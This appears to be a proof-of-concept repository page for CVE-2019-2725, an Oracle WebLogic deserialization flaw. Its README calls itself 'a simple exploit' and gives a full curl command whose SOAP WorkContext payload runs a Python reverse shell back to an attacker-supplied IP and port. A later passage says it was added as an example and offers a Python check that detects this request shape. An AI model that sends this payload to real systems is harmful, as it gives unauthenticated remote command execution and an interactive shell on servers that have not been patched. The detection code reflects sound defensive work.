CVE-2019-2725 PoC: Oracle Fusion Middleware WebLogic Server Component Access Control Error Vulnerability

Associated Vulnerability
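Title: Oracle Fusion Middleware WebLogic Server Component Access Control Error Vulnerability (CVE-2019-2725)
Description: Oracle Fusion Middleware is a business innovation platform from Oracle for enterprise and cloud environments. The platform provides middleware, software suites and related functionality. WebLogic Server is one of its components, an application server for cloud and traditional environments. The wls9_async_response package, included by default in some WebLogic versions, provides asynchronous communication services for WebLogic Server. Because this WAR package has a flaw in how it deserializes input, an attacker can send a specially crafted malicious HTTP request to gain privileges on the target server and, without authorization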
Description
A simple exploit for CVE-2019-2725.
Readme
# Exploit-CVE-2019-2725
A simple exploit for CVE-2019-2725.

  * Example Code:

```
curl -X POST https://127.0.0.1/_async/AsyncResponseService -H "Content-Type: text/xml" -d '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                    <void index="0">
                        <string>/bin/bash</string>
                    </void>
                    <void index="1">
                        <string>-c</string>
                    </void>
                    <void index="2">
                        <string> python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"MY_IP\",MY_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")" </string>
                    </void>
                </array>
            <void method="start"/></void>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>' -k
```
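The request above targets the `/_async/` path served by the wls9_async_response package and places XMLDecoder elements inside the SOAP `WorkContext` header. A detection check for that request shape follows, added here as an example and not part of the original README; the function names, the tag set and the placeholder sample body are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

ASYNC_PREFIX = "/_async/"  # context path of wls9_async_response, as in the README request
# Assumption for this example: XMLDecoder element names that create objects or call methods.
INSTRUCTION_TAGS = {"object", "new", "method", "void", "class", "array"}

def local_name(tag):
    """Strip the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]

def inspect_request(method, path, body):
    """Return findings for a request shaped like a WorkContext deserialization attempt."""
    if method.upper() != "POST" or not path.startswith(ASYNC_PREFIX):
        return []
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return ["DTD present; body not parsed"]  # SOAP forbids DTDs, so flag without parsing
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed XML: fall back to a coarse substring check instead of dropping it.
        return ["unparseable body mentioning WorkContext"] if "WorkContext" in body else []
    findings = []
    for ctx in (e for e in root.iter() if local_name(e.tag) == "WorkContext"):
        for el in ctx.iter():
            name = local_name(el.tag)
            if el is ctx or name not in INSTRUCTION_TAGS:
                continue
            attrs = "".join(f" {k}={el.get(k)}" for k in ("class", "method") if el.get(k))
            findings.append(f"<{name}{attrs}>")
    return findings

# Constructed sample: same structure as the README request, command replaced by a placeholder.
SAMPLE_BODY = (
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>PLACEHOLDER</string></void></array>'
    '<void method="start"/></void>'
    '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
)

if __name__ == "__main__":
    for finding in inspect_request("POST", "/_async/AsyncResponseService", SAMPLE_BODY):
        print("suspicious element in WorkContext:", finding)
```

The tag set is broad on purpose and needs tuning against the WorkContext headers your own applications send before it is used for blocking rather than alerting.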
File Snapshot

```
[4.0K] /data/pocs/60a5a04f4844062887242de46617cb86983baef0
├── [1.4K] README.md
└── [1.1K] shell.sh

0 directories, 2 files
```